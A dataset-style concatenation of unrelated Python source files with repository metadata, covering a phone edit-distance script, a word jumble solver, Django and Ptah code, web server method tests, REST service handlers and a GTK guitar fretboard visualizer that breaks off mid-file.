import sys, re, string, editdist # get edit distance by phone firstline = 0 phonesDict = dict() f = open("../Materials/nearPuns_phones.txt", "r") for l in f: if firstline == 0: firstline = 1 else: l = l.replace("\n", "") toks = l.split("\t") phones1 = toks[4].split() for p in phones1: phonesDict[p] = 1 phones2 = toks[5].split() for p in phones2: phonesDict[p] = 1 # print len(phonesDict.keys()) # make dictionary mapping phones onto distinct characters i = 65 for p in phonesDict.keys(): phonesDict[p] = chr(i) i = i + 1 f.close() f = open("../Materials/nearPuns_phones.txt", "r") firstline = 0 for l in f: l = l.replace("\n", "") if firstline == 0: toks = l.split("\t") print "\t".join(toks[0:6]) + "\tphoneDist" firstline = 1 else: toks = l.split("\t") phones1 = toks[4].split() phones1_trans = [] for p1 in phones1: t1 = phonesDict[p1] phones1_trans.append(t1) phones1_translated = "".join(phones1_trans) phones2 = toks[5].split() phones2_trans = [] for p2 in phones2: t2 = phonesDict[p2] phones2_trans.append(t2) phones2_translated = "".join(phones2_trans) phoneDist = editdist.distance(phones1_translated, phones2_translated) print "\t".join(toks[0:6]) + "\t" + str(phoneDist) + "\t" + str(len(phones1)) + "\t" + str(len(phones2))
UTF-8
Python
false
false
2,014
13,159,779,843,836
0f1f736f44a1d29756387aad2f692f3ef32fedab
c298ea6b6e6379b74764bd1d76f2510daecc387c
/word_jumble.py
7bd9a0a4000aecfdd51a08dd047d0642db64f79b
[]
no_license
kchandrasekera/word_jumble
https://github.com/kchandrasekera/word_jumble
e2ef5b31f0bdfa9f010a646792cf7c43bb3d44d7
edd4853f5f58ec11e197a1c50b9102b920acbb4e
refs/heads/master
2020-04-06T07:10:33.498441
2014-02-14T05:07:15
2014-02-14T05:07:15
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
def word_jumble(): scrambled_word = raw_input('Enter a word to scramble: ') matching_words = [] scrambled_word_length = len(scrambled_word) dictionary = import_dictionary('dictionary.txt') dictionary.sort(key = len) for word in dictionary: if len(word) > scrambled_word_length: if scrambled_word in matching_words: matching_words.remove(scrambled_word) break if matching_word(word, scrambled_word): matching_words.append(word) return matching_words def import_dictionary(file): dictionary_file = open(file) dictionary = dictionary_file.read().splitlines() dictionary_file.close() return dictionary def matching_word(word, scrambled_word): characters = list(scrambled_word) for letter in word: if letter in characters: characters.remove(letter) else: return False return True print word_jumble()
UTF-8
Python
false
false
2,014
6,347,961,713,447
93f2eea1b2c5e5225fd5d536cc97682676426453
d23161292ed65a3c4f5e7e9be0d204f30a31e757
/yushen_django_1_0/src/yushen/admin.py
e60c40282c2c3e0b9cf6bb369ba65a1c0b180226
[]
no_license
wolfsniper2388/yushen_django_1_0
https://github.com/wolfsniper2388/yushen_django_1_0
424126f6b9865c8d890cda1032bb63072f550682
fd7fd2ed98b01ff71e42a33cc09d2da8df6de652
refs/heads/master
2022-02-14T17:59:06.217577
2014-03-14T00:07:24
2014-03-14T00:07:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib import admin from yushen.models import Part # Register your models here. class PartAdmin(admin.ModelAdmin): list_display = ('identifier','type','elevator','visibility') list_filter = ['type', 'elevator', 'visibility'] search_fields = ['identifier'] admin.site.register(Part, PartAdmin)
UTF-8
Python
false
false
2,014
17,867,063,964,727
e1f4211e4dee261872e7e95f748cdc32a171de4f
0aae130425f7b1ebee373388245f385502746002
/src/api/session.py
15b64e034acb507979613f3a7d6794c70f862943
[]
no_license
tdyhacker/smuggler
https://github.com/tdyhacker/smuggler
525d5bc985a9dcbe4b5c24e14706ee37604653b9
e839a95e302062227aecc5a68c8dc1da50639c5f
refs/heads/master
2015-09-26T03:12:44.809144
2009-06-30T16:59:48
2009-06-30T16:59:48
41,992,961
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class User(object): def __init__(self, id, nickName, displayName, passwordHash, accountType, fileSizeLimit): self.id = id self.nickName = nickName self.displayName = displayName self.passwordHash = passwordHash self.accountType = accountType self.fileSizeLimit = fileSizeLimit def __repr__(self): return '<%s id = %s, nickName = %s, displayName = %s>' % (self.__class__.__name__, self.id, self.nickName, self.displayName) class Session(object): def __init__(self, id): self.id = id def __repr__(self): return '<%s "%s">' % (self.__class__.__name__, self.id)
UTF-8
Python
false
false
2,009
128,849,052,166
ae59c221568944a3fa33bf4e7038b53d61f123fe
91b051b7a8d837033761cc10d69a6e47c64fd600
/ptah/crowd/tests/test_validation.py
1fe49efeb22df241ae25d1db40d459d874d8ba93
[ "BSD-2-Clause", "BSD-3-Clause" ]
permissive
blaflamme/ptah
https://github.com/blaflamme/ptah
f315c9f0de9b6fc56904589fe701435b971f6a51
32497151e0556b84d47a146499dfe1bcb0ab02db
refs/heads/master
2021-01-18T12:15:02.895925
2011-11-02T03:00:30
2011-11-02T03:00:30
2,692,172
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os, transaction import ptah, ptah.crowd from ptah import config from ptah.authentication import AuthInfo from pyramid.testing import DummyRequest from base import Base class Principal(object): def __init__(self, uri, name, login): self.uri = uri self.name = name self.login = login class TestValidation(Base): def test_validation_auth_checker_validation(self): from ptah.crowd.validation import validationAndSuspendedChecker principal = Principal('1', 'user', 'user') props = ptah.crowd.get_properties(principal.uri) props.validated = False # validation disabled info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = False self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['allow-unvalidated'] = False self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() # validation enabled info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = True ptah.crowd.CONFIG['allow-unvalidated'] = False self.assertFalse(validationAndSuspendedChecker(info)) self.assertEqual(info.message, 'Account is not validated.') transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['allow-unvalidated'] = True self.assertTrue(validationAndSuspendedChecker(info)) transaction.commit() # validated props = ptah.crowd.get_properties(principal.uri) props.validated = True transaction.commit() info = AuthInfo(True, principal) ptah.crowd.CONFIG['validation'] = True self.assertTrue(validationAndSuspendedChecker(info)) def test_validation_auth_checker_suspended(self): from ptah.authentication import AuthInfo from ptah.crowd.validation import validationAndSuspendedChecker principal = Principal('2', 'user', 'user') props = ptah.crowd.get_properties(principal.uri) props.validated = True props.suspended = False info = AuthInfo(True, principal) self.assertTrue(validationAndSuspendedChecker(info)) props.suspended = True transaction.commit() info = AuthInfo(True, principal) self.assertFalse(validationAndSuspendedChecker(info)) self.assertEqual(info.message, 'Account is suspended.') def test_validation_registered_unvalidated(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = True config.notify(ptah.events.PrincipalRegisteredEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertFalse(props.validated) def test_validation_registered_no_validation(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = False config.notify(ptah.events.PrincipalRegisteredEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) def test_validation_added(self): from ptah.crowd.provider import CrowdUser user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = False config.notify(ptah.events.PrincipalAddedEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) user = CrowdUser('name', 'login', 'email') ptah.crowd.CONFIG['validation'] = True config.notify(ptah.events.PrincipalAddedEvent(user)) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated) def test_validation_initiate(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser origValidationTemplate = validation.ValidationTemplate class Stub(origValidationTemplate): status = '' token = None def send(self): Stub.status = 'Email has been sended' Stub.token = self.token validation.ValidationTemplate = Stub user = CrowdUser('name', 'login', 'email') request = self._makeRequest() validation.initiate_email_validation(user.email, user, request) self.assertEqual(Stub.status, 'Email has been sended') self.assertIsNotNone(Stub.token) t = ptah.token.service.get_bydata(validation.TOKEN_TYPE, user.uri) self.assertEqual(Stub.token, t) validation.ValidationTemplate = origValidationTemplate def test_validation_template(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser origValidationTemplate = validation.ValidationTemplate user = CrowdUser('name', 'login', 'email') request = self._makeRequest() template = validation.ValidationTemplate( user, request, email = user.email, token = 'test-token') template.update() res = template.render() self.assertIn( "You're close to completing the registration process.", res) self.assertIn( "http://localhost:8080/validateaccount.html?token=test-token", res) def test_validate(self): from ptah.crowd import validation from ptah.crowd.provider import CrowdUser, Session user = CrowdUser('name', 'login', 'email') Session.add(user) Session.flush() t = ptah.token.service.generate(validation.TOKEN_TYPE, user.uri) request = DummyRequest() self._setRequest(request) try: validation.validate(request) except: pass self.assertIn( "Can't validate email address.", request.session['msgservice'][0]) props = ptah.crowd.get_properties(user.uri) props.validated = False request.GET['token'] = t request.session.clear() try: validation.validate(request) except: pass self.assertIn( "Account has been successfully validated.", request.session['msgservice'][0]) props = ptah.crowd.get_properties(user.uri) self.assertTrue(props.validated)
UTF-8
Python
false
false
2,011
17,987,323,049,093
548797ee026a8c97003be93e363922e193b989c3
c88e0f422509881ffcceebc6edf3384f51ef0602
/Oblig 3/src/loop_regex.py
5b88d7ffe7c7ef65ff5262168b989491a98d2a46
[]
no_license
typisk/Inf3331
https://github.com/typisk/Inf3331
8745d19146a5edc4136c0400bbd14ce5b1bdeaaa
213a71ffc653fadaa9757400f184520337952109
refs/heads/master
2020-06-05T15:17:05.804973
2011-11-03T18:14:46
2011-11-03T18:14:46
2,270,427
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import re loop1 = '[0:12]' loop2 = '[0:12, 4]' r1 = r'\[(.+):(.+?),?(.*)\]' r2 = r'\[(.+):(.+),?(.*)\]' r3 = r'\[(\d+):(\d+)\,?\s?(\d+)?\]' print re.search(r3, loop1).groups() print re.search(r3, loop2).groups()
UTF-8
Python
false
false
2,011
2,834,678,440,287
975d263e8be2870bdaf1c9d2afa6602170c95b56
3f879f624add3a7c591825856526a3faace6e603
/qa/299-MethodsRequestBodyHandling.py
3d077fe3540697800aa7240be97d33259063e483
[ "GPL-2.0-only" ]
non_permissive
sanyaade-embedded-systems/webserver
https://github.com/sanyaade-embedded-systems/webserver
10900bbaeb0a20261c5a5681544fc4348377749b
435910ebc5e255152215869ff08f26ca2bd132fd
refs/heads/master
2020-04-05T23:23:38.234423
2012-08-30T17:31:36
2012-08-30T17:31:36
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from base import * DIR = "299-MethodsRequestBodyHandling" MAGIC = "Report bugs to http://bugs.cherokee-project.com" METHODS = { 'required': [ 'POST', 'PUT', 'MERGE', 'SEARCH', 'REPORT', 'PATCH', 'PROPFIND', 'PROPPATCH', 'UPDATE', 'LABEL', ], 'optional': [ 'OPTIONS', 'DELETE', 'MKCOL', 'COPY', 'MOVE', 'LOCK', 'UNLOCK', 'VERSION-CONTROL', 'CHECKOUT', 'UNCHECKOUT', 'CHECKIN', 'MKWORKSPACE', 'MKACTIVITY', 'BASELINE-CONTROL', ] } CONF = """ vserver!1!rule!1280!match = directory vserver!1!rule!1280!match!directory = /%s vserver!1!rule!1280!handler = common """ % (DIR) class TestEntry (TestBase): """Test for HTTP methods with required and optional request bodies being received and processed correctly by Cherokee. """ def __init__ (self, method, send_input, input_required): TestBase.__init__ (self, __file__) self.request = "%s /%s/ HTTP/1.0\r\n" % (method, DIR) +\ "Content-type: text/xml\r\n" self.expected_content = [] if input_required and not send_input: self.expected_error = 411 else: self.expected_error = 200 self.expected_content.append("Method: %s" % method) if send_input: self.request += "Content-length: %d\r\n" % (len(MAGIC)) self.post = MAGIC self.expected_content.append("Body: %s" % MAGIC) else: self.forbidden_content = 'Body:' class Test (TestCollection): def __init__ (self): TestCollection.__init__ (self, __file__) self.name = "Method Request Body Handling" self.conf = CONF self.proxy_suitable = True def Prepare (self, www): d = self.Mkdir (www, DIR) f = self.WriteFile (d, "test_index.php", 0444, """ <?php echo 'Method: '.$_SERVER['REQUEST_METHOD']; ?> <?php $body = @file_get_contents('php://input'); if (strlen($body) > 0): echo "Body: $body"; endif; ?> """) def JustBefore (self, www): # Create sub-request objects self.Empty () # Create all tests with different methods - all methods # should only work with request bodies. With no request # body a 411 Length Required should result. for method in METHODS['required']: self.Add (TestEntry (method=method, send_input=True, input_required=True)) self.Add (TestEntry (method=method, send_input=False, input_required=True)) # Create all tests with different methods - all methods # should work with and without request bodies. for method in METHODS['optional']: #Test method when for when sending a request body self.Add (TestEntry (method=method, send_input=True, input_required=False)) #Test method when not sending a request body self.Add (TestEntry (method=method, send_input=False, input_required=False))
UTF-8
Python
false
false
2,012
1,949,915,182,782
fbfef634a20fe41e766ffda0d6de0240ff453334
8fc3808225d2589259182b3d6c7918d0e6c3ab3a
/backend/handlers/service.py
498b642ece6f94e3affeb662ba1632f3d3251124
[]
no_license
tomowang/GUI
https://github.com/tomowang/GUI
4e5da37011643c9ecda6a85d189da799c5fba1b7
fe2625484470f69d0c82ceccdf16edb05382d149
refs/heads/master
2016-09-16T15:13:09.031259
2014-02-19T14:03:49
2014-02-19T14:03:49
63,295,289
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import json import logging import web import validictory from utils.decorator import * from utils.error import RESTError from utils import schema from dbapi.CMDB import CMDB class Services(): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, collector_id, **kwargs): logging.debug('Services.GET') logging.info('collector id: %s' % collector_id) web.header('Content-Type', 'application/json') if collector_id == 'null': return json.dumps([]) services = self.cmdb.GetServiceList(int(collector_id)) logging.debug(services) if not services: services = [] return json.dumps(services) @authentication @access_control def POST(self, collector_id, **kwargs): logging.debug('Services.POST') logging.debug('collector id: %s' % collector_id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') try: service = json.loads(web.data()) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.JSON_OBJECT_DECODE_ERROR') logging.debug('service: %s' % service) try: validictory.validate(service, schema.SERVICE_POST_PUT_SCHEMA) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.INVALID_PARAMETER', e.message) if service['service_type'] != 'TCP' and len(service['service_url']) == 0: raise RESTError('DEBUG.400.INVALID_PARAMETER') service['collector_id'] = int(collector_id) ret = self.cmdb.AddService(service) logging.info('add service result: %s' % ret) if not ret: raise RESTError('ERROR.500.ADD_SERVICE_ERROR') web.webapi.Created() return class Service(): def __init__(self): self.cmdb = CMDB() @authentication @access_control def PUT(self, collector_id, id, **kwargs): logging.debug('Service.PUT') logging.debug('collector id: %s' % collector_id) logging.debug('id: %s' % id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') try: service = json.loads(web.data()) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.JSON_OBJECT_DECODE_ERROR') logging.debug('service: %s' % service) try: validictory.validate(service, schema.SERVICE_POST_PUT_SCHEMA) except (ValueError, TypeError), e: raise RESTError('DEBUG.400.INVALID_PARAMETER', e.message) if service['service_type'] != 'TCP' and len(service['service_url']) == 0: raise RESTError('DEBUG.400.INVALID_PARAMETER') service['service_id'] = int(id) service['collector_id'] = int(collector_id) ret = self.cmdb.UpdateService(service) logging.info('update service result: %s' % ret) if not ret: raise RESTError('ERROR.500.UPDATE_SERVICE_ERROR') web.webapi.OK() return @authentication @access_control def DELETE(self, collector_id, id, **kwargs): logging.debug('Service.DELETE') logging.debug('collector id: %s' % collector_id) logging.debug('id: %s' % id) if collector_id == 'null': raise RESTError('DEBUG.400.INVALID_PARAMETER') ret = self.cmdb.DeleteService(int(collector_id), int(id)) logging.info('delete service result: %s' % ret) if not ret: raise RESTError('ERROR.500.DELETE_SERVICE_ERROR') web.webapi.OK() return class ServiceList(object): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, collector_id, mode, **kwargs): logging.debug('ServiceList.GET') logging.info('collector id: %s' % collector_id) logging.info('mode: %s' % mode) web.header('Content-Type', 'application/json') if collector_id == 'null': return json.dumps([]) lookup = {'http': self.cmdb.GetHTTPServiceList, 'tcp': self.cmdb.GetTCPServiceList, 'all': self.cmdb.GetServiceList} ret = lookup[mode](int(collector_id)) ret = [{'service_id': service['service_id'], 'service_name': service['service_name']} for service in ret] return json.dumps(ret) class ServiceTree(object): def __init__(self): self.cmdb = CMDB() @authentication def GET(self, **kwargs): logging.debug('ServiceTree.GET') web.header('Content-Type', 'application/json') collectors = self.cmdb.GetCollectorList() res = [] if not collectors: collectors = [] for collector in collectors: tmp = {'title': collector['collector_name'], 'isFolder': True, 'key': collector['collector_id'], 'children': []} services = self.cmdb.GetServiceList(collector['collector_id']) if not services: services = [] for service in services: tmp['children'].append({'title': service['service_name'], 'key': service['service_id'], 'type': service['service_type']}) res.append(tmp) return json.dumps(res) SERVICE_GROUP_TYPE_MAPPING = {1: 'HTTP', 2: 'TCP'} SERVICE_GROUP_TYPE_R_MAPPING = {'HTTP': 1, 'TCP': 2} class ServiceGroups(object): def __init__(self): self.cmdb = CMDB() def GET(self, mode, **kwargs): web.header('Content-Type', 'application/json') logging.info('mode: %r' % mode) if mode == 'all': #mode = ['HTTP', 'TCP'] mode = SERVICE_GROUP_TYPE_MAPPING.keys() else: #mode = [mode.upper()] mode = [SERVICE_GROUP_TYPE_R_MAPPING[mode.upper()]] sg_list = self.cmdb.GetServiceGroupList() if not sg_list: sg_list = [] sg_list = [sg for sg in sg_list if sg['group_type'] in mode] for sg in sg_list: sg['service_list'] = self.cmdb.GetServiceGroupServiceIdInfo(sg['group_id']).values() sg['group_type'] = SERVICE_GROUP_TYPE_MAPPING[sg['group_type']] for s in sg['service_list']: s['service_name'] = self.cmdb.GetServiceInfo(s['collector_id'], s['service_id'])['service_name'] return json.dumps(sg_list) def POST(self, **kwargs): data = json.loads(web.data()) return self.cmdb.AddServiceGroupsDict(data) class ServiceGroup(object): def __init__(self): self.cmdb = CMDB() def GET(self, id, **kwargs): web.header('Content-Type', 'application/json') sg = self.cmdb.GetServiceGroupDict(int(id)) if sg: sg['service_list'] = self.cmdb.GetServiceGroupServiceIdInfo(sg['group_id']).values() sg['group_type'] = SERVICE_GROUP_TYPE_MAPPING[sg['group_type']] return json.dumps(sg) raise RESTError('INFO.404.ITEM_NOT_FOUND') def PUT(self, id, **kwargs): data = json.loads(web.data()) if not self.cmdb.AddServiceGroupsDict(data, int(id)): raise RESTError('INFO.404.ITEM_NOT_FOUND') def DELETE(self, id, **kwargs): if not self.cmdb.DeleteServiceGroupInfo(int(id)): raise RESTError('INFO.404.ITEM_NOT_FOUND')
UTF-8
Python
false
false
2,014
936,302,895,966
122400e5f585b9cfbaeaf55a9572048a6a3e2ec2
a96fa6daae2ae23b7bdcf9f1ff47fec1eb4f511d
/Visualizer.py
5dd0ddb61f1fd5cbda67a77b9615708598bbb713
[ "GPL-3.0-only" ]
non_permissive
mygrsun/Python-Guitar-Transcription-Aid
https://github.com/mygrsun/Python-Guitar-Transcription-Aid
f380d29099f67284d8e6133538e7df8c186bc20d
264892d4989f8bf025c84b35e65a1b17be4ab51c
refs/heads/master
2020-04-06T04:15:25.183296
2010-10-07T19:55:46
2010-10-07T19:55:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import gtk, numpy, cairo, goocanvas, gobject import gst import Math # == PLAN == # class SemitoneBase(goocanvas.ItemSimple, goocanvas.Item) # class SemitoneGradient(SemitoneBase) # class SemitoneCumulate(SemitoneBase) # [class SemitoneAnalyze(SemitoneBase)] # # class FretboardBase(goocanvas.Group) # class Fretboard(FretboardBase) # class SingleString(FretboardBase) # # class FretboardWindowBase(gtk.Window) # class FretboardWindow(FretboardWindowBase) # class SingleStringWindow(FretboardWindowBase) # [class PlotWindow(gtk.Window)] # problem: if x or y is changed, will update be called? class Semitone(goocanvas.ItemSimple, goocanvas.Item): x = gobject.property(type=gobject.TYPE_DOUBLE) y = gobject.property(type=gobject.TYPE_DOUBLE) width = gobject.property(type=gobject.TYPE_DOUBLE, default=30) height = gobject.property(type=gobject.TYPE_DOUBLE, default=20) semitone = gobject.property(type=gobject.TYPE_DOUBLE, default=0) def __init__(self, control, method="gradient", **kwargs): goocanvas.ItemSimple.__init__(self,**kwargs) if not self.props.tooltip: self.props.tooltip = Math.note_name(self.semitone)+" ("+str(self.semitone)+") ["+str(Math.semitone_to_frequency(self.semitone))+" Hz]" self.method = method self.control = control self.control.connect("new_data", self.new_data) self.matrix = None # override ItemSimple def do_simple_paint(self, cr, bounds): cr.translate(self.x, self.y) cr.rectangle(0.0, 0.0, self.width, self.height) if not self.control.has_data: cr.set_source_rgb(1.,1.,1.) elif self.method=="cumulate": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) magnitude = Math.power_to_magnitude(power / 1.5 / 1000) const,slope = self.control.get_brightness_coefficients_for_magnitude() brightness = slope*magnitude + const print self.semitone,"mag",magnitude,"tpow",power,"b",brightness,"pow",fpower cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="test": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) upper_dependence = min(1.,upper_dependence) lower_dependence = min(1.,lower_dependence) total_dependence = min(1., upper_dependence+lower_dependence) power *= 1. - total_dependence magnitude = Math.power_to_magnitude(power / 1.5 / 1000) const,slope = self.control.get_brightness_coefficients_for_magnitude() brightness = slope*magnitude + const cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="inharmonicity": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = standard_deviation / 0.5 cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="lower_dependence": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = lower_dependence cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="upper_dependence": fpower, power, center, standard_deviation, upper_dependence, lower_dependence = self.control.analyze_semitone(self.semitone) brightness = upper_dependence cr.set_source_rgb(brightness,brightness,brightness) elif self.method=="gradient": assert not self.matrix==None gradient = self.control.get_gradient() gradient.set_matrix(self.matrix) cr.set_source(gradient) else: raise ValueError, "Invalid method" cr.fill_preserve() cr.set_source_rgb(0.,0.,0.) cr.stroke() def do_simple_update(self, cr): half_line_width = self.get_line_width() / 2. self.bounds_x1 = self.x - half_line_width self.bounds_y1 = self.y - half_line_width self.bounds_x2 = self.x + self.width + half_line_width self.bounds_y2 = self.y + self.height + half_line_width self.matrix = cairo.Matrix() self.matrix.scale(1./self.width,1.) self.matrix.translate((self.semitone-0.5)*self.width, 0) def do_simple_is_item_at(self, x, y, cr, is_pointer_event): if x < self.x: return False if y < self.y: return False if x > self.x+self.width: return False if y > self.y+self.height: return False return True # callbacks def new_data(self, control): self.changed(False) class FretboardBase(goocanvas.Group): def __init__(self, control, volume, **kwargs): self.volume = volume self.control = control if "strings" in kwargs: self.strings = kwargs["strings"] del kwargs["strings"] else: self.strings = [-5,-10,-14,-19,-24,-29] if "frets" in kwargs: self.frets = kwargs["frets"] del kwargs["frets"] else: self.frets = 12 if "rectwidth" in kwargs: self.rectwidth = kwargs["rectwidth"] del kwargs["rectwidth"] else: self.rectwidth = 30 if "rectheight" in kwargs: self.rectheight = kwargs["rectheight"] del kwargs["rectheight"] else: self.rectheight = 20 if "paddingx" in kwargs: self.paddingx = kwargs["paddingx"] del kwargs["paddingx"] else: self.paddingx = 5 if "paddingy" in kwargs: self.paddingy = kwargs["paddingy"] del kwargs["paddingy"] else: self.paddingy = 7 if "markers_radius" in kwargs: self.markers_radius = kwargs["markers_radius"] del kwargs["markers_radius"] else: self.markers_radius = self.rectheight/4. if "markers" in kwargs: self.markers = kwargs["markers"] del kwargs["markers"] else: self.markers = [5,7,9] if "capo" in kwargs: self.capo = kwargs["capo"] del kwargs["capo"] else: self.capo = 0 if "method" in kwargs: self.method = kwargs["method"] del kwargs["method"] else: self.method = "gradient" goocanvas.Group.__init__(self,**kwargs) self.pipeline = gst.parse_launch("audiotestsrc name=src wave=saw ! volume name=volume ! gconfaudiosink") self.construct(self.paddingx, self.paddingy) def construct(self, posx, posy): # fretboard for string in xrange(len(self.strings)): semitone = self.strings[string] for fret in xrange(self.frets+1): x = posx + fret*self.rectwidth y = posy + self.rectheight*string rect = Semitone(self.control, semitone=semitone+fret, method=self.method, parent=self, x=x, y=y, width=self.rectwidth, height=self.rectheight) rect.connect("button_press_event", self.press_semitone, string, fret) rect.connect("button_release_event", self.release_semitone) y = posy + self.rectheight*(len(self.strings) + 0.5) for fret in self.markers: x = posx + self.rectwidth*(fret+0.5) circle = goocanvas.Ellipse(parent=self, center_x=x, center_y=y, radius_x=self.markers_radius, radius_y=self.markers_radius) circle.props.fill_color_rgba=0x333333ff circle.props.line_width=0 if self.capo: x = posx + self.rectwidth*(self.capo+.3) y1 = posy y2 = posy + self.rectheight*len(self.strings) width = self.rectwidth/3 goocanvas.polyline_new_line(self, x,y1,x,y2, width=line_width, stroke_color_rgba=0x660000cc, pointer_events=0) # draw nut x = posx + self.rectwidth*.3 y1 = posy y2 = posy + self.rectheight*len(self.strings) width = self.rectwidth/3 goocanvas.polyline_new_line(self, x,y1,x,y2, line_width=width, stroke_color_rgba=0xcc0000cc, pointer_events=0) def get_width(self): return self.get_bounds().x2 - self.get_bounds().x1 + 2*self.paddingx def get_height(self): return self.get_bounds().y2 - self.get_bounds().y1 + 2*self.paddingy # callbacks def press_semitone(self,semitone,target,event,string,fret): if event.button==1: self.pipeline.get_by_name("volume").set_property("volume", self.volume.get_value()) self.pipeline.get_by_name("src").set_property("freq", Math.semitone_to_frequency(semitone.semitone)) self.pipeline.set_state(gst.STATE_PLAYING) elif event.button==3: self.open_context_menu(semitone,event,string,fret) def release_semitone(self,item,target,event): self.pipeline.set_state(gst.STATE_NULL) def open_context_menu(self, rect, event, string, fret): raise NotImplementedError, "override this method!" def add_tab_marker(self, item, target, event, string, fret): self.control.emit("add-tab-marker", string, fret) def plot_evolution(self, item, target, event, semitone): self.control.emit("plot-evolution", semitone) def find_onset(self, item, target, event, semitone): self.control.emit("find-onset", semitone) def analyze_semitone(self, item, target, event, semitone): self.control.emit("analyze-semitone", semitone) def open_overtones(self, item, target, event, tuning): w = OvertoneWindow(self.control, tuning) w.show_all() def open_undertones(self, item, target, event, tuning): w = UndertoneWindow(self.control, tuning) w.show_all() def semitone_to_equalizer(self, item, target, event, semitone): self.control.emit("semitone-to-equalizer", semitone) def overtones_to_equalizer(self, item, target, event, semitone): self.control.emit("overtones-to-equalizer", semitone) # custom properties def do_get_property(self,pspec): return getattr(self, pspec.name) def do_set_property(self,pspec,value): setattr(self, pspec.name, value) class Fretboard(FretboardBase): def __init__(self, control, volume, **kwargs): FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) for string in xrange(len(self.strings)): semitone = self.strings[string] name = Math.note_name(semitone).upper() text = goocanvas.Text(parent=stringcaptions, x=0, y=string*self.rectheight, text=name, anchor=gtk.ANCHOR_EAST, font=10) text.connect("button_release_event", self.open_overtones, self.strings[string]) startx = posx + stringcaptions.get_bounds().x2-stringcaptions.get_bounds().x1 + 5 starty = posy + fretcaptions.get_bounds().y2-fretcaptions.get_bounds().y1 fretcaptions.props.x = startx + 0.5*self.rectwidth fretcaptions.props.y = posy stringcaptions.props.x = startx - 5 stringcaptions.props.y = starty + 0.5*self.rectheight # fretboard FretboardBase.construct(self, startx, starty) def open_context_menu(self, rect, event, string, fret): menu = gtk.Menu() item = gtk.MenuItem("Overtones") item.connect("activate", self.open_overtones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Undertones") item.connect("activate", self.open_undertones, item, None, self.strings[string]) menu.append(item) item = gtk.MenuItem("Analyze") item.connect("activate", self.analyze_semitone, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Plot") item.connect("activate", self.plot_evolution, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Find onset") item.connect("activate", self.find_onset, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Add to tabulature") item.connect("activate", self.add_tab_marker, item, None, string, fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive") item.connect("activate", self.overtones_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) item = gtk.MenuItem("Set equalizer transmissive (only root)") item.connect("activate", self.semitone_to_equalizer, item, None, self.strings[string]+fret) menu.append(item) menu.show_all() menu.popup(None, None, None, event.button, event.time) class Overtones(FretboardBase): def __init__(self, control, volume, **kwargs): if "tuning" in kwargs: self.tuning = kwargs["tuning"] del kwargs["tuning"] else: self.tuning = -5 if "overtones" in kwargs: self.overtones = kwargs["overtones"] del kwargs["overtones"] else: self.overtones = 10 if not "rectheight" in kwargs: kwargs["rectheight"] = 10 kwargs["strings"] = [] for multiplicator in xrange(1,self.overtones+2): semitone = self.tuning + 12.*numpy.log2(multiplicator) kwargs["strings"].append(semitone) if "method" in kwargs: if not kwargs["method"] in ["gradient","cumulate"]: raise ValueError, "invalid method for Overtones" FretboardBase.__init__(self, control, volume, **kwargs) def construct(self, posx, posy): # captions fretcaptions = goocanvas.Group(parent=self) for fret in xrange(1,self.frets+1): goocanvas.Text(parent=fretcaptions, x=fret*self.rectwidth, y=0, text=str(fret), anchor=gtk.ANCHOR_NORTH, font=10) stringcaptions = goocanvas.Group(parent=self) goocanvas.Text(parent=stringcaptions, x=0, y=0, text="f.", anchor=gtk.ANCHOR_EAST, font=10) for overtone in xrange(1,self.overtones+1): name = str(overtone)+"." 